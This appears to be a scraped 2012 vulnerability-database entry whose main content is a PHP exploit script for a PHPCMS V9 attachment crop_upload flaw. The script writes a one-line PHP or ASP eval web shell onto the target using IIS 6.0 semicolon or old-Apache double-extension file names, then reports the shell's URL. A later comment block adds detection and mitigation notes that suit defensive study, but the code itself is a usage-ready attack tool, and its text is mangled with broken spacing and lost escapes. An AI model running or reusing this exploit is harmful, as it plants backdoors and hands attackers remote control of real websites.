PHPCMS V9 latest getshell vulnerability — vulnerability warning — The Black Bar Safety Net

2012-09-28T00:00:00
ID MYHACK58:62201235055
Type myhack58
Reporter 佚名
Modified 2012-09-28T00:00:00

Description

! usr/bin/php-w <? php
/*
 * Exploit listing as extracted: whitespace and escape sequences are mangled and the
 * text is kept byte-for-byte; the comments here describe the request it issues so the
 * behaviour can be recognised and blocked.
 *
 * The script builds one raw HTTP/1.1 POST to
 *   /index.php?m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://<host>/uploadfile/<name>
 * whose body is a one-line script, then scans the response with a regex for the first
 * "http://...jpg" URL and prints it ("url address:") or reports "didn't get!".
 * <name> is picked by argv[2]: 1 -> "1. asp;1.jpg", 2 -> "1.php;1.jpg", 3 -> "1.php.jpg";
 * the banner ties the ';' names to IIS 6.0 and the double-extension name to old Apache.
 *
 * Defensive notes (grounded in the request shape above):
 *   - Detection: alert on requests to a=crop_upload whose file= parameter points back at
 *     the site's own /uploadfile/ path, or whose target name contains ';' or a second
 *     extension. width=1&height=1 together with the fixed "Firefox/5.0.1" User-Agent and
 *     "Connection: close" are weaker secondary indicators.
 *   - Mitigation: crop_upload must not fetch and store an arbitrary URL supplied in file=;
 *     normalise the stored name to a single whitelisted image extension, reject ';' in
 *     names, and verify the fetched bytes are an image before writing them under uploadfile/.
 *   - Response: a stored-URL reply to such a request means the write succeeded; audit
 *     uploadfile/ for files matching the three name patterns listed above.
 */

error_reporting(E_ERROR); set_time_limit(0); $pass="xxx"; print_r('

+---------------------------------------------------------------------------+

PHPCms V9 GETSHELL 0DAY

c0de by testr00ttest admin163.net

For iis6. 0 vulnerability a bit tasteless but can also be used

apache is old version may cause problems

+---------------------------------------------------------------------------+

'); echo 'password for'.$ pass; if ($argc < 2) { print_r('

+---------------------------------------------------------------------------+

Usage: php '.$ argv[0].' url [js]

js type Configuration 1 to asp 2 for php 3 apache version

Example:

php '.$ argv[0].' localhost 1

+---------------------------------------------------------------------------+

'); exit; } $url=$argv[1]; $js=$argv[2];//Write into the script type $phpshell='<? php @eval($_POST[".$ pass."]);?>'; $aspshell='<%eval request("'.$ pass.'")%>'; if($js==1){ $file="1. asp;1.jpg"; $ret=GetShell($url,$aspshell,$file); }else if($js==2){ $file="1.php;1.jpg"; $ret=GetShell($url,$phpshell,$file); }else if($js==3){ $file="1.php.jpg"; $ret=GetShell($url,$phpshell,$file); }else{ print_r('no select the script type'); } $pattern = "|http://[^,]+?. jpg,?| U"; preg_match_all($pattern, $ret, $matches); if($matches[0][0]){ echo "rnurl address:".$ matches[0][0]; }else{ echo "rn didn't get!"; } function GetShell($url,$shell,$js){ $content =$shell; $data = "POST /index. php? m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://".$ url."/ uploadfile/".$ js." HTTP/1.1 rn"; $data .= "Host: ".$ url."rn"; $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/2 0 1 0 0 1 0 1 For Firefox/5.0.1 rn"; $data .= "Accept: textml,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 rn"; $data .= "Accept-Language: EN-us,EN;q=0.8,en-us;q=0.5,en;q=0.3 rn"; $data .= "Connection: closern"; $data .= "Content-Length: ". strlen($content)."rnrn"; $data .= $content."rn"; //echo $data; $ock=fsockopen($url,8 0); if (!$ ock) { echo "[*] No response from ".$ url."n"; } fwrite($ock,$data); $resp = "; while (! feof($ock)) { $resp.= fread($ock, 1 0 2 4); } return $resp; } ?>